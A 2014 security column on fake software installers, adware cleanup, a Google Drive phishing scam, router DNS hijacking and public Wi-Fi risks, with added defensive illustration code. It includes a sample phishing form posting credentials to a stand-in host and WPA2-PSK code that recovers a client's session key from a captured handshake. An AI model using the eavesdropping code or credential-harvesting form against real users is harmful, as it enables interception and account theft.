Thursday 16 October 2014

Anonymous networking

Davey Winder wonders if a social network can ever be truly anonymous, and is horrified by Facebook’s latest announcement.

Love it or loathe it, the Portable Document Format (PDF) – developed by Adobe and released to the world in 1993 – is a fact of online life. If you do any kind of internet research, you’re sure to find documents in this format, and while most web browsers have built-in PDF viewers, they’re typically less well featured than the real Adobe Reader. Regulars to these pages will know that I’ve been bashing Adobe for the past few years due to various security vulnerabilities in its products, not to mention the seemingly endless torrent of fix patches, but for once I’m putting these security matters aside to concentrate on an altogether different complaint.


Buy any new PC these days and it will almost certainly come stuffed with crapware (sorry, there’s really no more pleasant word). You know the kind of stuff – unwanted commercial software trials supposedly bundled to add value to your purchase, but in fact included purely to boost the vendor’s profits through partnership deals.

The first thing I do when I’m configuring a new computer is to uninstall as much crapware as possible, and replace it with software I actually want. Most people I know do the same, including technology guru Dick Pountain. He told me recently he’d just bought a new laptop that came with a fairly horrible commercial PDF reader preinstalled, so he went to Google to grab a link to the kosher Adobe Reader download site.

I wasn’t too surprised when he told me the first two links returned were both “fakes”, by which he meant that although the Adobe Reader XI software was genuine, it came wrapped inside a modified installer that wanted to shovel all sorts of potentially dangerous – and most definitely unwanted – software onto his laptop alongside it.

The URLs included the word “adobe” in order to appear legit and thus entice the unwary into downloading instead of going to the official Adobe site (which lay third in that particular listing). Other links claiming to offer Adobe Reader will be adverts, sponsored links or – worse still – malware-ridden scams in disguise.

Over the years, I’ve evolved to a point of sponsored-search blindness where I simply don’t see such links any more; I always head straight for the organic results. However, as Dick pointed out, not everyone is as cynical as we are. Others may believe that Google’s unofficial corporate motto of “Don’t be evil” is reflected in the real world, and that all adverts returned in search lists are actually genuine, helpful and harmless.

If you don’t mind your computer being clogged up with unwanted software, particularly of the browser toolbar and adware variety, go ahead and ignore my advice. For everyone else, here it is: don’t be fooled by the Google AdWords manipulators, and never click on an advert at the top of the results list. Organic search results are easy enough to distinguish if you take the time to look a little closer at the URLs, so always go direct.

This advice applies to a multitude of high-risk online scenarios: an email from your bank asking you to log in via a helpful link, a Facebook post that includes a link to a vendor’s special offer, and search results for software.

If you want Adobe Reader, get it direct from Adobe – go to www.adobe.com/au, scroll to the bottom and look in the footer for the download link. Alternatively, jump straight to http://get.adobe.com/reader for a direct download instead.

This advice also applies to any well-known brand of software: bypass Google search and the dodgy download sites and head straight for the obvious home domain, from where you’ll be able to progressively navigate to a download section to ensure that you install the real thing.
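As an added illustration (not part of the column), the check a cautious reader makes by eye on the URLs can be written down. The script below, which assumes a list of official vendor domains that you supply (here only adobe.com), separates links that really belong to the vendor from lookalikes that merely contain the brand name, including the user@host trick and punycode hosts, and from plain third-party download sites. The search-result URLs in it are constructed samples.

```python
from urllib.parse import urlsplit

# Domains this example treats as official sources for Adobe Reader (an
# assumption for the example; extend the set for other vendors).
OFFICIAL_DOMAINS = frozenset({"adobe.com"})


def host_of(url: str) -> str:
    """The host a browser would really connect to for this link.

    urlsplit().hostname is lower-cased and already excludes any
    'user:password@' prefix, so http://adobe.com@evil.example/ yields
    'evil.example', not 'adobe.com'.
    """
    return (urlsplit(url.strip()).hostname or "").rstrip(".")


def classify_download_link(url: str, official=OFFICIAL_DOMAINS) -> str:
    """Return 'official', 'lookalike' or 'third-party' for a search-result link."""
    parts = urlsplit(url.strip())
    host = host_of(url)
    brands = {d.split(".")[0] for d in official}          # {'adobe'}
    if parts.scheme in ("http", "https") and any(
        host == d or host.endswith("." + d) for d in official
    ):
        return "official"          # adobe.com itself or a real subdomain such as get.adobe.com
    if any(b in url.lower() for b in brands) or any(
        label.startswith("xn--") for label in host.split(".")
    ):
        # Brand name used as bait in the host, path, query or userinfo, or an
        # internationalised label that could be a homograph of the brand.
        return "lookalike"
    return "third-party"


def official_links(urls):
    """Keep only the links worth clicking; everything else is 'go direct' territory."""
    return [u for u in urls if classify_download_link(u) == "official"]


if __name__ == "__main__":
    # Constructed sample of what a search-results page might return.
    results = [
        "http://adobe-reader-download.example.net/setup.exe",
        "http://adobe.com.evil.example/reader",
        "http://adobe.com@evil.example/reader",
        "https://www.adobe.com/au",
        "http://get.adobe.com/reader",
        "http://filehosting.example/dl/12345",
    ]
    for u in results:
        print(f"{classify_download_link(u):12} {u}")
    print("safe to click:", official_links(results))
```

Note that the check is on the host the browser will connect to, not on whether the string “adobe” appears anywhere, which is exactly the bait the fake sites rely on.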

The problem is – and to confuse matters still further – the official Adobe Reader download plays the same game. As you can see from the screenshot below, when you go to Adobe’s site and try to download Adobe Reader, it tries to force a “free” copy of McAfee Security Scan Plus on you. I use the terms “tries” and “force” deliberately here, because the checkbox for adding this product to your download package is automatically ticked – you have to opt out, rather than opt in, which is never welcome. I’m not saying the McAfee product is rubbish, since I haven’t tried it. But when I download a PDF reader, I want something to read PDFs, not something to perform a security scan; I already have one of those...

But what if you’ve already fallen for a fake Adobe Reader – or fake anything – software scam? Hopefully you’ll have been protected from any malware installations by the security software you’re running (and you are running something, aren’t you?). Perhaps you have double-whammy protection, such as my default setup these days: Eset Smart Security and Malwarebytes Anti-Malware Premium, which seem to run in perfect harmony and provide a good level of broad threat protection. But even with this added safety net, there’s still a chance that when you signed the end-user licence agreement (EULA) you agreed to install lots of unwanted apps.

Search toolbars and assorted adware – some of which may evade your security measures, depending on how you have them configured – are common examples. I have a templated response for anyone who contacts me about an “accidental install”, as they’re prone to calling them, which has caused their security software to go haywire and throw up warning after warning about blocked installations and quarantined files. (Of course, such warnings are a good thing, since they mean your defences are doing what they should, but they don’t guarantee that you haven’t been infected by something.) This is the type of scenario where my cleanup template comes into play:

• Create a new restore point.
• Download AdwCleaner (www.bleepingcomputer.com/download/adwcleaner/) and run a scan.
• Use AdwCleaner’s “clean” function to remove anything it finds.
• Download Junkware Removal Tool (www.bleepingcomputer.com/download/junkware-removal-tool/).
• After disconnecting physically from the internet by switching off your router, close your security software (to prevent any conflict) and then run a scan.
• Once complete, with any toolbars or search bars removed, restart your security software and reconnect your router.
• Then, download RogueKiller (www.bleepingcomputer.com/download/roguekiller/).
• Remove any external drives (including any USB ones) and start the scan.
• Once the RogueKiller scan has finished, click “delete” and allow it to kill any rogue processes.
• Finally, delete all of the above tools from your computer. You should now hopefully be free of adware, crapware and malware.

I’d also encourage less tech-savvy family members and colleagues of PC & Tech Authority readers to install the freeware FileHippo.com Update Checker (www.filehippo.com/updatechecker). This scans for installed software and gets updates when available without pop-ups or the danger of spyware.

PHOOLING THE PHISHERMEN

There’s been much coverage online of what’s being described as a “dangerously convincing” and “clever and tricky-to-spot” phishing scam involving Google Drive. One tech journalist even said it was “almost impossible” to know it was a fake.

I can only assume that it’s the use of a google.com URL and Google SSL encryption that is leading people to describe it in these terms. After all, it starts with an unsolicited email with the subject “Important Google Document” and comes complete with a Google Drive link. I admit that there’s always a danger you might get such an email from a friend, work colleague or member of your social networking circle whose account has been hacked, which would add conviction through the old leverage-of-trust issue. Even then, it’s still not convincing enough. The message itself says simply: “Please view this document I have uploaded using Google Docs” and goes on to stress that “it is very important” without even trying to explain why.

In the event that you were foolhardy enough to fall for this not-at-all-convincing spiel, that’s when things became interesting (I use the past tense because Google removed the fake pages sharpish). The fake login page was actually hosted on Google’s servers by using a public folder inside a Google Drive account, to make it appear more genuine, with Drive’s preview function enabling the use of a publicly accessible URL for the link. Once you logged in via this fake page, your credentials were scraped off to a compromised server while you viewed the pointless document.
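The mechanism described above, as an added example rather than anything from the column or from Google: the page itself sat on a google.com address, so the thing to inspect is not the address bar but where the login form sends what you type. The parser below pulls every form containing a password field out of an HTML page and reports whether its action goes to the genuine sign-in host (assumed here to be accounts.google.com), somewhere else under google.com, or a foreign host. The page URL and the HTML are constructed samples.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

GOOGLE_DOMAIN = "google.com"              # "Google-hosted" for this example
REAL_LOGIN_HOST = "accounts.google.com"   # assumption: the only host that should see a Google password

# Constructed sample: a credential-harvesting page of the kind described above,
# served from a Google-hosted preview URL but posting the form to an attacker host.
FAKE_PAGE_URL = "https://docs.google.com/file/d/EXAMPLEID/preview"
FAKE_PAGE = """
<html><body>
<h2>Google Drive</h2><p>Please sign in to view this document.</p>
<form method="post" action="http://compromised.example/collect.php">
  <input name="Email" type="email">
  <input name="Passwd" type="password">
  <input type="submit" value="Sign in">
</form>
</body></html>
"""
# Constructed comparison pages: one posting to the real sign-in host, one with
# no action at all (which posts back to the page's own host).
GENUINE_PAGE = '<form method="post" action="https://accounts.google.com/"><input name="Email"><input name="Passwd" type="password"></form>'
RELATIVE_PAGE = '<form method="post"><input name="Passwd" type="PASSWORD"></form>'


class LoginFormFinder(HTMLParser):
    """Collect every <form>, noting whether it contains a password field."""

    def __init__(self):
        super().__init__()
        self.forms = []          # [{'action': str, 'has_password': bool}, ...]
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = {"action": a.get("action") or "", "has_password": False}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            if (a.get("type") or "").lower() == "password":
                self._current["has_password"] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def in_domain(host: str, domain: str) -> bool:
    return host == domain or host.endswith("." + domain)


def audit_login_page(page_url: str, html: str):
    """One finding per password form: where the credentials would be POSTed and
    whether that destination is the genuine sign-in host, merely Google-owned,
    or foreign.  Forms without a password field are ignored."""
    finder = LoginFormFinder()
    finder.feed(html)
    findings = []
    for form in finder.forms:
        if not form["has_password"]:
            continue
        target = urljoin(page_url, form["action"])   # '' and relative actions resolve against the page
        host = urlsplit(target).hostname or ""
        if host == REAL_LOGIN_HOST:
            verdict = "genuine"
        elif in_domain(host, GOOGLE_DOMAIN):
            verdict = "google-hosted but not the sign-in service"
        else:
            verdict = "foreign"
        findings.append({"posts_to": target, "verdict": verdict})
    return findings


if __name__ == "__main__":
    for name, page in (("fake", FAKE_PAGE), ("genuine", GENUINE_PAGE), ("relative", RELATIVE_PAGE)):
        print(name, audit_login_page(FAKE_PAGE_URL, page))
```

The “google-hosted but not the sign-in service” verdict is the interesting one: a form on a Drive preview URL that posts back to Drive is still not where a Google password belongs.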

Beyond the obvious advice – don’t click links or open attachments from anyone who sends you an unexpected email that says “view this document” – there are two simple tips that can save you from such login scrapers.

First, always deliberately get your login details wrong at the first attempt: have a fake username/email and stupid password ready for every initial login. If the site you’re looking at is genuine, it will spit back the credentials and ask you to try again, but most fakes will accept the first thing you enter without question, at which point red flags should be raised and the words “run away” should be ringing in your ears. You might also like to refer to my “emergency response template” above, just in case of drive-by downloads.

More observant readers will have spotted that I qualified this by saying “most fakes”. Here’s the thing: some login scrapers are clever enough to automatically refuse your first attempt to sidestep such a defence, or – in the case of some man-in-the-middle attacks – buy time by retrying the logins and performing their nefarious activity while you’re attempting to log in over and again. However, I’d say that we’re talking about at least 95% of all fake login sites here, so the ruse is still a very good first line of defence to adopt.

What you then need is a strong second line to shore this up, and this is where I get back on my two-factor soapbox again, I’m afraid. The use of two-factor authentication (2FA) or verification is growing, and is available on many sites now, including Google. If you had two-factor authentication up and running, then even if you’d fallen for the Google Drive scam and given up your login and password, these would have been worthless to the phishermen. They wouldn’t have been able to access or compromise your account from an unverified device without the passcode that would be texted to your smartphone or generated by your authentication code app. The one caveat is the man-in-the-middle kit mentioned above: a fake that relays your password and then your one-time code straight to the real Google login while you wait can get into that one session, so 2FA raises the bar considerably rather than removing it altogether.

Sure, it can be a faff, especially when you first set it up and have to go through the rigmarole of verifying your devices, but once that’s done it really isn’t a huge inconvenience for the superior protection it confers.

In fact, I’d go so far as to say that someone with a poor password and 2FA is better protected than someone with a complex password but no 2FA.

DANGEROUS ROUTE

Routers, while essential, are pretty dull, so when they’re promoted from the review pages to news headlines in the tech press, you know that something bad is happening.

The breaking bad here is an ongoing story about backdoors and vulnerabilities in router firmware. The latest twist in the tale is that more than 300,000 wireless routers around the world have fallen under the control of a cybercriminal gang, or gangs, who exploit DNS redirection to point unknowing small-business and home-router users at sites that install drive-by-download malware, or change the adverts being displayed for the referral money. Routers from D-Link, Micronet and TP-Link are among the models being hit, and research suggests that as many as 80% of installed routers in this sector could have critical security vulnerabilities.

This should come as no surprise to anyone who’s had the misfortune to delve into the dark art of router firmware updates. It’s a smelly can of worms, so most folk don’t bother updating. But they should. Indeed, as far as the average user is concerned, “if it ain’t broke…” applies, but these routers are badly, badly broken and need to be fixed.

Educating people that their router needs to be kept patched and up to date as much as their computer or smartphone is proving to be difficult, so I fear that this is an exploit vector that will only grow and grow, especially as the type of DNS redirection that’s come to light is particularly profitable when exploited on a highly organised scale.

Your mum may have her PC secured fairly well these days, but you can bet that her router hasn’t been touched since it came out of the box – it will almost certainly still have its default admin login settings intact. I’m advising anyone who will listen to log on to their router via the admin interface (a quick Google will reveal how to do this if you’re not sure, including bringing up the default admin password for your particular model) and check that its DNS settings are as they should be for your ISP – your ISP’s tech support will be able to provide this information if you don’t have it to hand. They certainly shouldn’t be 5.45.75.11 or 5.45.76.36, which are being used in the current redirection attack.

While you have your router at your mercy, change your admin login and password. Finally, look for the update settings and check to see if any new firmware update is available.
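An added example (not from the column) of the DNS check above, done from the PC rather than the router’s admin page. It parses the “DNS Servers” lines of ipconfig /all on Windows, or the nameserver lines of /etc/resolv.conf elsewhere, and classifies each address as one of the two rogue servers named above, a LAN address (normally the router itself, whose upstream DNS setting then needs checking in the admin interface), an address inside your ISP’s range, or an unexpected public resolver. The ISP range used here (203.0.113.0/24, a documentation network) is an assumption you replace with what your ISP tells you, and the ipconfig output is a constructed sample.

```python
import ipaddress
import re

# Servers the column reports being pushed to hijacked routers (from the text above).
ROGUE_DNS = frozenset({"5.45.75.11", "5.45.76.36"})

# Assumption for the example: your ISP's resolvers live in this range.
# 203.0.113.0/24 is a documentation network; substitute your ISP's real addresses.
ISP_DNS_NETWORKS = [ipaddress.ip_network("203.0.113.0/24")]

# Private and link-local ranges: a DNS server here is normally the router itself.
LAN_NETWORKS = [ipaddress.ip_network(n) for n in
                ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "fc00::/7", "fe80::/10")]

# Constructed sample of 'ipconfig /all' output on a PC behind a hijacked router.
SAMPLE_IPCONFIG = """
Windows IP Configuration

Wireless LAN adapter Wi-Fi:

   Connection-specific DNS Suffix  . : home
   IPv4 Address. . . . . . . . . . . : 192.168.1.23
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.1.1
   DNS Servers . . . . . . . . . . . : 192.168.1.1
                                       5.45.75.11
   NetBIOS over Tcpip. . . . . . . . : Enabled
"""


def _is_ip(s: str) -> bool:
    try:
        ipaddress.ip_address(s.split("%", 1)[0])   # drop an IPv6 zone index such as %12
        return True
    except ValueError:
        return False


def parse_ipconfig(text: str):
    """DNS server addresses from 'ipconfig /all' output, all adapters.
    Extra servers appear on continuation lines holding just an address."""
    servers, collecting = [], False
    for line in text.splitlines():
        m = re.match(r"\s*DNS Servers[ .]*:\s*(\S+)", line)
        if m:
            servers.append(m.group(1))
            collecting = True
        elif collecting and _is_ip(line.strip()):
            servers.append(line.strip())
        else:
            collecting = False
    return servers


def parse_resolv_conf(text: str):
    """nameserver entries from /etc/resolv.conf (Mac, Linux)."""
    out = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) >= 2 and parts[0] == "nameserver":
            out.append(parts[1])
    return out


def classify_dns_server(addr, isp_networks=ISP_DNS_NETWORKS, rogue=ROGUE_DNS,
                        trusted_public=frozenset()):
    """'rogue', 'isp', 'trusted-public', 'lan' or 'unexpected-public'.
    trusted_public is for resolvers you configured yourself on purpose."""
    ip = ipaddress.ip_address(addr.split("%", 1)[0])
    if str(ip) in rogue:
        return "rogue"
    if any(ip in n for n in isp_networks):
        return "isp"
    if str(ip) in trusted_public:
        return "trusted-public"
    if any(ip in n for n in LAN_NETWORKS):
        return "lan"
    return "unexpected-public"


def audit_dns_servers(servers, **kw):
    verdicts = {s: classify_dns_server(s, **kw) for s in servers}
    return {
        "verdicts": verdicts,
        "hijacked": any(v == "rogue" for v in verdicts.values()),
        # A LAN resolver is the router: its own upstream setting must be checked in the admin UI.
        "check_router_upstream": any(v == "lan" for v in verdicts.values()),
    }


if __name__ == "__main__":
    print(audit_dns_servers(parse_ipconfig(SAMPLE_IPCONFIG)))
```

In the sample the PC has been given the router (192.168.1.1) and one of the rogue servers directly; when the PC only lists the router, the verdict is “check_router_upstream” and the real answer is on the router’s own DNS page.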

Many people have been repeating the obvious advice that doing your online banking or checking your email using free public Wi-Fi in a coffee shop or an airport lounge isn’t safe. This is hardly a myth, and it’s easy for someone to eavesdrop on your session using readily available packet-sniffing tools. I’ve used various freely available tools for my laptop and Android tablet that let me sniff out login data – for research purposes only, I hasten to add – and they work remarkably well.

Encrypted sessions are a different matter and can’t be easily circumvented, so it is possible to use public Wi-Fi securely, as long as everything you do travels over HTTPS or through a VPN. The catch is the Wi-Fi layer itself: on a network protected by a shared passphrase (WPA2-PSK), anyone who knows that passphrase and captures the four-way handshake when your laptop joins can derive your session keys and read whatever you send unencrypted, just as on an open network. Only WPA2 Enterprise (802.1X), which gives every user their own keys, prevents that, and this ain’t gonna happen in your local coffee shop. A VPN does hide the contents of your traffic from such a sniffer, but only once the tunnel is up and only for traffic that actually goes through it; the captive-portal login, DNS lookups and whatever your apps do in the background before the VPN connects are all fair game.
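Why the shared passphrase matters, as an added worked example (mine, not the column’s): on a WPA2-PSK network the PMK is derived from nothing but the passphrase and the SSID, and the per-session keys come from the PMK plus four values that cross the air in the clear during the four-way handshake. The code below implements the standard 802.11i derivation with only the Python standard library and shows an eavesdropper who knows the passphrase and has captured a handshake computing the same temporal key as the client, while a wrong passphrase fails the MIC check. The SSID, passphrase, MAC addresses, nonces and the EAPOL message bytes are constructed stand-ins; the PMK test vector (“password” / “IEEE”) is the one published in the 802.11 standard’s annex.

```python
import hashlib
import hmac


def wpa2_pmk(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes).
    With WPA2-PSK this is identical for every device on the network: anyone
    who knows the passphrase can compute it.  Under 802.1X the PMK comes out
    of each user's own EAP exchange instead, so this shortcut does not exist."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"), ssid.encode("utf-8"), 4096, 32)


def _prf(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    """IEEE 802.11 PRF-n: concatenate HMAC-SHA1(key, label || 0x00 || data || i)
    for i = 0, 1, ... and truncate to nbytes."""
    out = b""
    for i in range((nbytes + 19) // 20):
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:nbytes]


def wpa2_ptk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """Pairwise Transient Key for CCMP (48 bytes: KCK | KEK | TK).  Every input
    other than the PMK is sent unencrypted in the four-way handshake."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return _prf(pmk, b"Pairwise key expansion", data, 48)


def eapol_mic(kck: bytes, eapol_frame_mic_zeroed: bytes) -> bytes:
    """MIC over an EAPOL-Key frame for WPA2: HMAC-SHA1 with the KCK, first 16 bytes."""
    return hmac.new(kck, eapol_frame_mic_zeroed, hashlib.sha1).digest()[:16]


def recover_session_key(candidate_passphrase, ssid, ap_mac, sta_mac, anonce, snonce,
                        eapol_msg2_mic_zeroed, captured_mic):
    """What an eavesdropper who knows (or guesses) the passphrase does with a
    captured handshake: derive the PTK, check it against the captured MIC and,
    if it matches, return the temporal key that decrypts the client's data
    frames.  Returns None when the passphrase is wrong."""
    pmk = wpa2_pmk(candidate_passphrase, ssid)
    ptk = wpa2_ptk(pmk, ap_mac, sta_mac, anonce, snonce)
    kck, tk = ptk[:16], ptk[32:48]
    if not hmac.compare_digest(eapol_mic(kck, eapol_msg2_mic_zeroed), captured_mic):
        return None
    return tk


def demo():
    """Client and eavesdropper side by side on a constructed WPA2-PSK network.
    Returns (client's TK, eavesdropper's recovered TK, result with a wrong guess)."""
    ssid, passphrase = "CoffeeShopWiFi", "freecoffee2014"      # constructed network
    ap_mac = bytes.fromhex("001122334455")                       # constructed BSSID
    sta_mac = bytes.fromhex("66778899aabb")                      # constructed client MAC
    anonce, snonce = bytes(range(32)), bytes(range(32, 64))      # fixed here instead of random
    # Stand-in for EAPOL-Key message 2 with its MIC field zeroed; a real capture
    # supplies the actual frame bytes.
    msg2 = b"\x02\x03\x00\x75" + b"\x02\x01\x0a" + snonce + bytes(56)

    # Client side: derive the keys and stamp the MIC on message 2.
    client_ptk = wpa2_ptk(wpa2_pmk(passphrase, ssid), ap_mac, sta_mac, anonce, snonce)
    mic_on_air = eapol_mic(client_ptk[:16], msg2)

    # Eavesdropper side: everything except the passphrase came from the capture.
    recovered = recover_session_key(passphrase, ssid, ap_mac, sta_mac, anonce, snonce, msg2, mic_on_air)
    wrong = recover_session_key("freecoffee2013", ssid, ap_mac, sta_mac, anonce, snonce, msg2, mic_on_air)
    return client_ptk[32:48], recovered, wrong


if __name__ == "__main__":
    tk, recovered, wrong = demo()
    print("client TK      :", tk.hex())
    print("eavesdropper TK:", recovered.hex() if recovered else None)
    print("wrong passphrase:", wrong)
```

The same MIC check is what offline passphrase-guessing tools run against a captured handshake, which is why a guessable coffee-shop passphrase is no better than an open network.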

The best advice, then, as far as using free public Wi-Fi goes, is just don’t bother.